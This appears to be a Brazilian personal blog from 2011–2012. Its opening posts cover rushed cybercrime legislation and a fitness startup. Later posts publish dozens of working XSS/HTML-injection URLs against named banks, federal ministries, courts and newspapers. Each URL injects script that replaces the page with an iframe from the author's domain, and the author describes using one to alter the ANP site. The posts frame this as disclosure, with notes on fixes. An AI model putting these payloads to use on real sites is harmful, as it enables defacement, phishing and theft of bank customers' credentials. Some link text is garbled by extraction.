Últimas da Blogosfera

metaldot (4 unread)

Cuidado para não gerar uma legislação que só atenda uma demanda num momento de pânico

Posted: May 15, 2012, 3:39am MDT

Fiquei triste e com medo ao ler que a Câmara aprovou numa votação simbólica (que durou 5 minutos) o Projeto de Lei 2793/11 comandado pelo Deputado Paulo Teixeira (PT-SP) que tipifica crimes cibernéticos. Fiquei triste porque o Marco Civil da Internet deveria ser discutido e votado primeiro e aí sim depois discutir projetos de criminalização. Mas o Marco Civil passou um bom tempo na gaveta até começar a ser instalado =/

15/05/2012 18:28 - Plenário inicia sessão para votar projeto sobre crimes cibernéticos
15/05/2012 18:33 - Câmara aprova projeto sobre crimes cibernéticos

Ao ler a notícia sobre a votação do PL 2793/11, a primeira coisa que pensei foi o caso do vazamento das fotos da atriz Carolina Dieckmann e qual seria a influência nesse caso, uma vez que não é a primeira vez que algo é votado por "clamor público" e/ou "movido pelo pânico".

"Depois da morte do garoto João Hélio, de seis anos, no Rio Janeiro, a Câmara dos Deputados acelerou os trabalhos e aprovou, em regime de urgência, alterações legislativas de combate à criminalidade que estavam engavetadas há pelo menos um ano. Os três projetos aprovados devem seguir agora para análise do Senado Federal e, se não sofrerem alterações, seguir à sanção presidencial."

Nessa correria provocada pelo "clamor público" devido a insegurança gerada pelos grandes veículos de comunicação porque um dos criminosos era menor de idade, a maioridade penal baixou para 16 anos e teve gente que pediu para baixar para 13 anos.

Outro exemplo foi a sequência de ataques DoS em sites .gov.br no ano passado (até me chamaram de "hacker do bem", para diversão da Yaso e da Dani). Confesso que achei que o AI-5 Digital do nosso querido Deputado Eduardo Azeredo seria aprovado na mesma semana. Ufá! Ainda bem, não foi.

Lembrei do caso do garoto João Hélio porque quando fui trabalhar na Secretaria de Assuntos Legislativos (SAL) do Ministério da Justiça, o Ricardo Poppi me mostrou um vídeo onde o ex-Secretário Pedro Abramovay falava sobre o cuidado para não gerar uma legislação que só atenda uma demanda num momento de pânico (Fica a dica pro Poppi publicar o video).

E a pergunta que fica é, quais são as consequências de aprovar leis no calor do momento?

Para jogar mais lenha na fogueira, "o presidente da Câmara, o Deputado Marco Maia disse que a Câmara precisa construir mecanismos para permitir um filtro entre a "boa e a má informação" (como mentiras) veiculadas em redes sociais. "Precisamos no curto e médio prazos aproximar a evolução do mundo tecnológico e a legislação para garantir a liberdade de expressão", disse."

Pelo jeito, ele é mais um Deputado que defende a censura da rede e é a favor do AI-5 Digital.
Cuidado para não gerar uma legislação que só atenda uma demanda num momento de pânico

Posted: May 15, 2012, 3:39am MDT

Fiquei triste e com medo ao ler que a Câmara aprovou numa votação simbólica (que durou 5 minutos) o Projeto de Lei 2793/11 comandado pelo Deputado Paulo Teixeira (PT-SP) que tipifica crimes cibernéticos. Fiquei triste porque o Marco Civil da Internet deveria ser discutido e votado primeiro e aí sim depois discutir projetos de criminalização. Mas o Marco Civil passou um bom tempo na gaveta até começar a ser instalado =/

15/05/2012 18:28 - Plenário inicia sessão para votar projeto sobre crimes cibernéticos
15/05/2012 18:33 - Câmara aprova projeto sobre crimes cibernéticos

Ao ler a notícia sobre a votação do PL 2793/11, a primeira coisa que pensei foi o caso do vazamento das fotos da atriz Carolina Dieckmann e qual seria a influência nesse caso, uma vez que não é a primeira vez que algo é votado por "clamor público" e/ou "movido pelo pânico".

"Depois da morte do garoto João Hélio, de seis anos, no Rio Janeiro, a Câmara dos Deputados acelerou os trabalhos e aprovou, em regime de urgência, alterações legislativas de combate à criminalidade que estavam engavetadas há pelo menos um ano. Os três projetos aprovados devem seguir agora para análise do Senado Federal e, se não sofrerem alterações, seguir à sanção presidencial."

Nessa correria provocada pelo "clamor público" devido a insegurança gerada pelos grandes veículos de comunicação porque um dos criminosos era menor de idade, a maioridade penal baixou para 16 anos e teve gente que pediu para baixar para 13 anos.

Outro exemplo foi a sequência de ataques DoS em sites .gov.br no ano passado (até me chamaram de "hacker do bem", para diversão da Yaso e da Dani). Confesso que achei que o AI-5 Digital do nosso querido Deputado Eduardo Azeredo seria aprovado na mesma semana. Ufá! Ainda bem, não foi.

Lembrei do caso do garoto João Hélio porque quando fui trabalhar na Secretaria de Assuntos Legislativos (SAL) do Ministério da Justiça, o Ricardo Poppi me mostrou um vídeo onde o ex-Secretário Pedro Abramovay falava sobre o cuidado para não gerar uma legislação que só atenda uma demanda num momento de pânico (Fica a dica pro Poppi publicar o video).

E a pergunta que fica é, quais são as consequências de aprovar leis no calor do momento?

Para jogar mais lenha na fogueira, "o presidente da Câmara, o Deputado Marco Maia disse que a Câmara precisa construir mecanismos para permitir um filtro entre a "boa e a má informação" (como mentiras) veiculadas em redes sociais. "Precisamos no curto e médio prazos aproximar a evolução do mundo tecnológico e a legislação para garantir a liberdade de expressão", disse."

Pelo jeito, ele é mais um Deputado que defende a censura da rede e é a favor do AI-5 Digital.
Primeiro prêmio da Fitnova

Posted: March 25, 2012, 7:14pm MDT

No dia 20 de março aconteceu o desafio Startup Minas Meetup e a Fitnova foi o projeto campeão. Em segundo lugar ficou Nota de Corte e em terceiro Meritt, Guiando Telecom e Meliuz.

A organização do desafio (Circuito Startup) classificou dez projetos e sorteou dois projetos durante o evento. Cada projeto tinha 2 minutos de apresentação para vender o peixe para uma banca de jurados composta por investidores e empreendedores, entre eles Rodolfo Zhouri (Endeavor), Gustavo Ziller (Aorta) e Simon Olson (Google).

Sobre o Startup Minas Meetup:

"O Startup Belo Horizonte é um encontro entre Empreendedores, Investidores, Incubadoras, Aceleradoras de Negócios, Mídia e interessados. Possui formato Happy Hour, facilitando e estimulando o diálogo entre um grande número de pessoas. Cada participante recebe uma identificação (nome, empresa e categoria), a partir daí, pode circular pelo salão e conversar com outras pessoas, de acordo com seu interesse. Trata-se de uma excelente oportunidade para ampliar sua rede de contatos, conhecendo pessoas com novas idéias, negócios inovadores ou mesmo investidores à procura de talentos."
Fitnova - Personal Trainer 2.0, Treinos Online e Fichas de Musculação

Posted: February 12, 2012, 2:20pm MST

No final do mês de Agosto de 2011 sai de Brasília e voltei a morar em BH para participar da elaboração e do desenvolvimento do Fitnova. Após alguns meses de trabalho duro junto com César Calixto, Gabriel Torres, Rafael Jorge e Saulo Medeiros, colocamos o projeto no ar no dia 12 de janeiro de 2012.

O projeto inicial era um protótipo com poucas coisas, mas ao longo do tempo mudamos e acrescentamos muitas coisas. A versão inicial já saiu com cara de produto e não de um protótipo. Fizemos um catálogo de exercícios com mais de 1200 exercícios com vídeos e mais de 10.000 programas de treinamentos.

Como funciona?

Após cadastro no site, é necessário preencher um questionário com 15 perguntas para descobrirmos o seu nível de condicionamento físico atual. Terminando essa etapa, temos um segundo questionários com 8 perguntas sobre o objetivos do seu treino. Com os dois questionários respondidos, um treino é selecionado com as suas características. Daí é começar a treinar, movimente-se!

Sobre a Fitnova:

"A Fitnova surgiu para oferecer uma plataforma tecnológica com o propósito de combater o sedentarismo. A Fitnova acredita que todas as pessoas interessadas em praticar uma atividade devem receber o que há de mais atual na ciência do treinamento baseado em princípios científicos, independente da condição social. Nossa filosofia principal é atuar como uma ferramenta de combate ao sedentarismo e a filosofia que norteia nossos trabalhos é a disponibilização de treinamentos de alta qualidade desenvolvidas por experts para todos que podem ou não pagar."

Vários bancos com falha de segurança (A saga continua)

Posted: May 20, 2011, 1:11am MDT

Durante a entrevista que concedi a Rede Brasil Atual me perguntaram se eu tinha testado a falha em outros sites de bancos, eu respondi que não, que a minha intenção era os sites dos Ministérios. Mas quando cheguei em casa (já falei que sou curioso) comecei a testar em alguns bancos.

Logo já apareceram alguns:

Banco Alfa
BRB (Banco de Brasília)
BANESE (Banco do Estado de Sergipe)
BANESTES (Banco do Estado do Espírito Santo)
BANRINSUL (Banco do Estado do Rio Grande do Sul)
BRP (Banco Ribeirão Preto)
BSMB (Banco Sumitomo Mitsui Brasileiro)

Os bancos gastam muito dinheiro com segurança e sempre vendem aquela velha falsa sensação de segurança para os clientes. Todos os sites que acessei foram via https, aquele cadeado de segurança que aparece no Navegador, o que não quer dizer nada, se o banco não faz a parte dele.

Além dos bancos, alguns outros sites .gov.br:

ANVISA (Agência Nacional de Vigilância Sanitária)
TCEMG (Tribunal de Contas do Estado de Minas Gerais)

Outras empresas:

IG
UNIMED

Da mesma forma que fiz antes (Segurança Nacional), enviei email para todos os órgãos envolvidos e estou aguardando alguma resposta. Happy Hack!

Screenshots:
Bancos

Banco Alfa	BANESE - Banco do Estado de Sergipe	BANESTES - Banco do Estado do Espírito Santo
BANRINSUL - Banco do Estado do Rio Grande do Sul	BRB - Banco de Brasília	BRP - Banco Ribeirão Preto
BSMB (Banco Sumitomo Mitsui Brasileiro)

.gov.br

ANVISA - Agência Nacional de Vigilância Sanitária

TCEMG - Tribunal de Contas do Estado de Minas Gerais

Outras empresas

UNIMED

Segue os links com as páginas alteradas, para confirmar
Bancos
* Banco">[metal.mundobugado.org] Alfa (ou sem">[metal.mundobugado.org] JavaScript)

https://wwws.alfanet.com.br/busca.aspx?__VIEWSTATE=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* BANESE">[metal.mundobugado.org] - Banco do Estado de Sergipe (ou sem">[metal.mundobugado.org] JavaScript)

https://wwws.banese.com.br/netbanking/index.jsp?Agencia="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* BANESTES">[metal.mundobugado.org] - Banco do Estado do Espírito Santo (ou sem">[metal.mundobugado.org] JavaScript)

https://wwws.banestes.com.br/cgi-bin/IB_Login?gb=passa&ct="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* BANRINSUL">[metal.mundobugado.org] - Banco do Estado do Rio Grande do Sul (ou sem">[metal.mundobugado.org] JavaScript) (Fixed! Corrigido!)

https://www.banrisul.com.br/bob/link/BOBW12HW_busca.asp?palavra=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* BRB">[metal.mundobugado.org] - Banco de Brasília (ou sem">[metal.mundobugado.org] JavaScript)

https://banknet.brb.com.br/brbBanknet/conteudoIframe.jsp?usuario=&ageconta="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* BRP">[metal.mundobugado.org] - Banco Ribeirão Preto (ou sem">[metal.mundobugado.org] JavaScript)

https://netbanking.brp.com.br/NetBanking/c_brp.asp?NumConta="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* BSMB">[metal.mundobugado.org] - Banco Sumitomo Mitsui Brasileiro (ou '>sem JavaScript)

http://www.smbcgroup.com.br/searchBrasilp/?SearchView&Query=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

.gov.br
* ANVISA">[metal.mundobugado.org] - Agência Nacional de Vigilância Sanitária (ou sem">[metal.mundobugado.org] JavaScript)

https://sngpc.anvisa.gov.br/AcessoPersistir.asp?senha=a&email=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* TCEMG">[gnu.org%27%20widht=%27500%27%20height=%27300%27%3E%3C!--">TCEMG] - Tribunal de Contas do Estado de Minas Gerais

http://www.tce.mg.gov.br/?cod_secao=5P&tipo=2&url=Pesquisa_Processo.asp&cod_secao_menu=5K&cpf="></td></tr></table><iframe src=" [gnu.org"] width="500" height="300">

Outras empresas
* IG">[metal.mundobugado.org] (ou sem JavaScript)

http://busca.igbusca.com.br/app/search?first_o=IG&q="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* [metal.mundobugado.org] title="UNIMED">UNIMED (ou sem JavaScript)

http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=49103&query="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

UPDATE 24/05/2001 - 14h03

Mensagem do BANRINSUL:

Prezado Marcelo,

Esta vulnerabilidade já havia sido identificada pelos nossos técnicos e estava em processo de correção.

Graças ao seu comunicado este procedimento foi priorizado e a vulnerabilidade corrigida.

Agradecemos seu contato.

UPDATE 24/05/2001 - 18h00

BANESTES corrigiu pela metade a falha, retirando o método GET e deixando o POST =/

Além disso, existem outras URLs e parâmetros com a falha que você pode [metal.mundobugado.org] title="Falha no BANESTES">testar aqui e [metal.mundobugado.org] title="Falha no BANESTES">aqui.

UPDATE 25/05/2001 - 11h15

BRP corrigiu pela metade a falha (você pode ver aqui), mas já agradeceu:



Marcelo,

O Banco BRP agradece pela sua informação.

Att.

Tecnologia da Informação

Banco BRP

UPDATE 25/05/2001 - 15h35
BRP corrigiu tudo

Segurança Nacional

Posted: May 11, 2011, 9:32pm MDT
De: "Marcelo Jorge Vieira" <metal@mundobugado.org>
Para: "ANP Imprensa" <imprensa@anp.gov.br>, "CAIXA - Imprensa" <imprensa@caixa.gov.br>, "Jorge Fontes Hereda" <presidencia@caixa.gov.br>, "Joaquim Lima de Oliveira" <vitec@caixa.gov.br>, "CEB - Comunicação Social" <prcoe@ceb.com.br>, "Conselho de Consumidores da CEB" <conselho.ceb@ceb.com.br>, "Glaucius Oliva" <presidencia@cnpq.br>, "CNPq Ascom" <comunicacao@cnpq.br>, "Olímpio Cruz" <olimpio.cruz@agricultura.gov.br>, "MMA Ascom" <imprensa@agricultura.gov.br>, "Maria Lucia Muniz" <mlmuniz@mct.gov.br>, "MCT Ascom" <ascomt@mct.gov.br>, "Maristela Rangel Pinto" <cgm@cultura.gov.br>, "Nanan Catalão" <nanan.catalao@cultura.gov.br>, "Denise Mantovani" <denise.mantovani@mda.gov.br>, "MDA Ascom" <comunicacao.social@mda.gov.br>, "Nunzio Briguglio Filho" <nunzio@mec.gov.br>, "MEC Ascom" <imprensa@mec.gov.br>, "Ramiro Alves" <ramiro.alves@fazenda.gov.br>, "MF Ascom" <acs@fazenda.gov.br>, "Gerusa Barbosa" <gerusa.barbosa@mma.gov.br>, "MMA Ascom" <ascom@mma.gov.br>, "Antônio Carlos" <aclima@mme.gov.br> ,"MME Ascom" <ascom@mme.gov.br>, "Vanice Cioccari" <vanice.cioccari@mj.gov.br>, "MJ Ascom" <acs@mj.gov.br>, "PBH Ascom" <ascom@planejamento.mg.gov.br>, "Walter Carlos Auad Sotomayor" <walter.sotomayor@turismo.gov.br>, "Turismo Ascom" <imprensa@turismo.gov.br>, "Selvino Heck" <mobsocial@planalto.gov.br>, "Casa Civil da Presidência da República" <mprensaccivil@presidencia.gov.br>, "Benjamin Zymler" <min-bz@tcu.gov.br>, "Augusto Nardes" <min-an@tcu.gov.br>, "Estadão - Fale com" <falecom.estado@grupoestado.com.br>, "Estadão - Portal" <portal@grupoestado.com.br>, "Nelson Nunes" <nnunes@diariosp.com.br>, "Carlos Alencar" <carlos.alencar@diariosp.com.br>, "Ulisses Oliveira" <ulisses.oliveira@diariosp.com.br>, "Teodomiro Braga" <teodomiro@otempo.com.br>, "Fábio A. Santos" <tecnologia@otempo.com.br>, "Luiz Fernando Rocha" <luizrocha@otempo.com.br>, "Mylena Fiori" <mfiori@cartamaior.com.br>, "Carta Maior - Redação" <redacao@cartamaior.com.br>, "Terra - Abuse" <abuse@terra.com.br>, "Terra - Editorial" <editorial@terra.com.br>, "Roberto Borges Martins" <presidencia@redeminas.mg.gov.br>, "Hugo Teixeira" <hugoteixeira@redeminas.mg.gov.br>, "Franco Brostel Nunes Leal" <franco@redeminas.mg.gov.br>, "Luiz Silvério Pereira Meireles" <ditec@redeminas.mg.gov.br>, "Rodolfo Fernandes" <rodolfo@oglobo.com.br>, "Maria Fernanda Delmas" <fernanda.delmas@oglobo.com.br>, "Ascânio Seleme" <ascanio@oglobo.com.br>, "Folha Emergência" <folhaemergencia@uol.com.br>, "Folha Poder" <politica@uol.com.br>, "Ministério da Defesa" <imprensa@defesa.gov.br>, "Ministério da Defesa - Ascom" <ascom@defesa.gov.br>,

Olá,

No início do mês de Abril, eu descobri uma falha no site da ANP (Agência Nacional do Petróleo), que eu explorei para mudar a visualização do site, inserindo um formulário, um abaixo-assinado, onde um visitante poderia assinar seu nome como uma forma de protesto aos altos preços dos combustíveis.

Essa falha (primária) não altera o conteúdo do site, apenas muda a visualização e só funciona, se o usuário clicar em um link "batizado" com parâmetros específicos, como, por exemplo, o link abaixo usado para inserir o formulário no site da ANP: [www.anp.gov.br] src='http://mundobugado.org/anp'> (o link não funciona mais, o pessoal da ANP já consertou a falha nesse ponto).

No meu blog, tem um relato explicando melhor o caso da ANP e o Mundo Bugado.

Como sou curioso, quis saber se outros sites também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.

.gov.br:
- ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)
- Brazilian Tourism Portal (Ministério do Turismo)
- CAIXA (O banco que acredita nas pessoas)
- CEB (Companhia Energética de Brasília)
- Domínio Público (Ministério da Educação)
- Embratur (Ministério do Turismo)
- MF (Ministério da Fazenda)
- MINC (Ministério da Cultura
- MMA (Ministério do Meio Ambiente)
- MME (Ministério de Minas e Energia)
- MDA (Ministério do Desenvolvimento Agrário)
- MCT (Ministério da Ciência e Tecnologia)
- Portal da Transparência (Presidência)
- Plataforma Lattes (CNPq)
- SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)
- TCU (Tribunal de Contas da União)
Jornal/TV:
- Estadão
- Carta Maior
- O TEMPO
- Diário de São Paulo
- Terra
- Rede Minas
O que eu quero com esse email?! Reportar essa falha, porque ela poderia ser explorada de várias maneiras:
- Uma pessoa mal intencionada poderia substituir a página inicial da CAIXA para "roubar" as contas de alguns clientes.
- Usar o site do Ministério da Cultura para falar mal da Ministra, uma vez que surgiram vários temas relacionados à ela nos últimos dias.
- Fazer mais uma campanha sobre os altos preços dos combustíveis no site da ANP.
- Usar o site do Ministério da Fazenda para falar que não é mais preciso declarar Imposto Renda.
- Publicar todas as falsas notícias no ESTADÃO, no Diário de São Paulo, no O Tempo, no Terra, na Carta Maior e na Rede Minas.
Com essa coleção de sites, é bem fácil criar uma rede de intrigas, verdades ou mentiras, como, por exemplo, "O brasil desistiu de sediar a copa", "O brasil vai vender a Amazônia", etc.

Por todos os motivos citados acima, essa falha é uma questão de Segurança Nacional.

Estou enviando e publicando esse email, porque não acredito no contato privado com suas instituições. A ANP demonstrou muito bem esse ponto ao não assumir a falha no site e no sistema de preços, e ainda fazer um comunicado sobre um endereço falso circulando na Internet e ao mesmo tempo retirar o sistema de consulta dos preços do ar.

Segue os links com as páginas alteradas, para confirmar

.gov.br:

* [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>">ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis) (Fixed! Corrigido!)
http://www.anp.gov.br/SITE/acao/estaaqui/?s1=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* Brazilian">[metal.mundobugado.org] Tourism Portal (Ministério do Turismo)
http://www.braziltour.com/busca.html?search=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* CAIXA">[metal.mundobugado.org] (O banco que acredita nas pessoas)
http://www1.caixa.gov.br/busca/resultados.asp?q2=1&q1=%27%29;}%29;%3C/script%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* CEB">[metal.mundobugado.org] (Companhia Energética de Brasília)
http://www.ceb.com.br/Ceb/aplicacoes/index.cfm?fuseaction=busca.realizarbusca&pesquisa=%3Ciframe%20src=%2 [metal.mundobugado.org]

* Domínio">[metal.mundobugado.org] Público (Ministério da Educação) (Fixed! Corrigido!)
http://www.dominiopublico.gov.br/pesquisa/PesquisaAutorResultadoForm.do?letra=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%2 [metal.mundobugado.org]

* [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>">Embratur (Ministério do Turismo)
http://www.embratur.gov.br/site/br/busca/busca.php?palavra=','')"><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* MF">[metal.mundobugado.org] (Ministério da Fazenda) (Fixed! Corrigido!)
http://www.fazenda.gov.br/busca.asp?pesquisa=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* [metal.mundobugado.org] width="1260" height="9100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>">MINC (Ministério da Cultura)
http://fale.cultura.gov.br/sisouvidor/login/formularioLogin.jsp?UsuarioInvalido=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="9100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* MMA">[metal.mundobugado.org] (Ministério do Meio Ambiente)
http://www.mma.gov.br/sitio/index.php?ido=conteudo.pesquisa&busca=%22%3C/h2%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%2 [metal.mundobugado.org]

* MME">[metal.mundobugado.org] (Ministério de Minas e Energia)
http://www.mme.gov.br/mme/buscaresult.html?field=content&index=indice_mme&query=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* MDA">[metal.mundobugado.org] (Ministério do Desenvolvimento Agrário)
http://mda.gov.br/sistemas/sistemasmda/index.php?msg=%3Cscript%3E$%28function%28%29{%20$%28%22body%22%29.empty%28%29.append%28%22%3Cbody%20style=%27margin:%200px%200px%27%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* MCT">[metal.mundobugado.org] (Ministério da Ciência e Tecnologia)
http://www.mct.gov.br/index.php?action=/html/objects/search_result&searchquery=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload%20=%20function%28%29%20{%20document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>">Portal da Transparência (Presidência)
http://www.portaltransparencia.gov.br/despesasdiarias/resultado?consulta=rapida&periodoInicio="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* Plataforma">[metal.mundobugado.org] Lattes (CNPq)
http://buscatextual.cnpq.br/buscatextual/busca.do?metodo=buscar&textoBusca=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%2 [metal.mundobugado.org]

* SINDEC">[metal.mundobugado.org] (Sistema Nacional de Informações de Defesa do Consumidor) (Fixed! Corrigido!)
https://sindecbh.pbh.gov.br:444/sindecconsulta/?msg=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* TCU">[http:%2F%2Fmetal.mundobugado.org%2Ftcu%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E">TCU] (Tribunal de Contas da União)
https://login.tcu.gov.br/sso/jsp/login.jsp?site2pstoretoken=&p_submit_url=&p_cancel_url=&locale=%22%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [http:%2F%2Fmetal.mundobugado.org%2Ftcu%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E]

Jornal/TV:

* Estadão">[http:%2F%2Fmetal.mundobugado.org%2Festadao%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E">Estadão] (Fixed! Corrigido!)
http://www.estadao.com.br/busca/%3C%2Ftitle%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [http:%2F%2Fmetal.mundobugado.org%2Festadao%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E]

* Carta">[metal.mundobugado.org] Maior
http://cartamaior.com.br/templates/buscaExecutar.cfm?busca=%3C/title%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* O">[metal.mundobugado.org] TEMPO
http://www.otempo.com.br/videos/lista/?busca=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [metal.mundobugado.org]

* [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>">Diário de São Paulo
http://www.diariosp.com.br/?id=%2Fbusca.php&ds_busca=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src=" [metal.mundobugado.org] width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>

* Terra">[is.gd] (Fixed! Corrigido!)
http://buscador.terra.com.br/Default.aspx?source=Search&ca=s&query=%3C/title%3E%3Ciframe%20src=%2 [is.gd]

* Rede">[http%3A] Minas
http://www.redeminas.mg.gov.br/search/node/%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%2 [http%3A]

O que é HTML Injection ou XSS (Cross-site scripting)?

HTML Injection é um tipo de vulnerabilidade encontrada normalmente em sistemas Web e é explorada com a inserção de código HTML/JavaScript nos parâmetros de um formulário, por exemplo. Não faz nenhuma mudança nos arquivos do servidor, apenas muda a visualização dos dados para o usuário.

O que é HTML?

"HTML (acrônimo para a expressão inglesa HyperText Markup Language, que significa Linguagem de Marcação de Hipertexto) é uma linguagem de marcação utilizada para produzir páginas na Web" -- Wikipédia

O que é JavaScript?

JavaScript é uma linguagem de programação muito utilizada para produzir páginas na Web.

Como resolver?

Remover todas as tags HTML de todos os parâmetros. Para cada linguagem utilizada para produzir o site, existe uma forma de remover as tags: ASP, PHP, Python, Java.

-------

UPDATE 17/05/2011 - 20h34
ANP, Dominio Público e Terra corrigiram as "brechas".

UPDATE 18/05/2011 - 00h07
ESTADÃO corrigiu a "brecha".

UPDATE 18/05/2011 - 11h12
Caro Marcelo, A falha mencionada foi corrigida, agradecemos a notificação. Atenciosamente, Lucas Betti Domingues Equipe de Segurança Terra - Depto. de Abuse abuse@terra.com.br SAN - Servico de Atendimento Nacional Fax: (51) 3287-9087

UPDATE 19/05/2011 - 11h33
SINDEC corrigiu a "brecha".

UPDATE 23/05/2011 - 23h32
A CAIXA corrigiu a brecha pela metade, mas já foi um avanço. Vocês podem [metal.mundobugado.org] title="Falha">testar aqui e [metal.mundobugado.org] title="falha">aqui para comprovar que ainda existe a falha.

UPDATE 07/06/2011 - 17h08
O MF (Ministério da Fazenda) corrigiu a brecha. De um jeito tosco, mas corrigiu... agora eles retiram da busca os caracteres "<" e ">"

Quem procura, acha!

Posted: May 8, 2011, 6:48pm MDT

Você já tentou levantar os tapetes no corredor pra ver se tem alguma chave embaixo?

Depois do HTML Injection no site da ANP, fiquei com a pulga atrás da orelha, curioso, pra saber se outros sites também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.

.gov.br

ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)	Brazilian Tourism Portal	CAIXA (O banco que acredita nas pessoas)
CEB (Companhia Energética de Brasília)	Domínio Público	Embratur
MF (Ministério da Fazenda)	MINC (Ministério da Cultura)	MMA (Ministério do Meio Ambiente)
MME (Ministério de Minas e Energia)	MDA (Ministério do Desenvolvimento Agrário)	Portal da Transparência
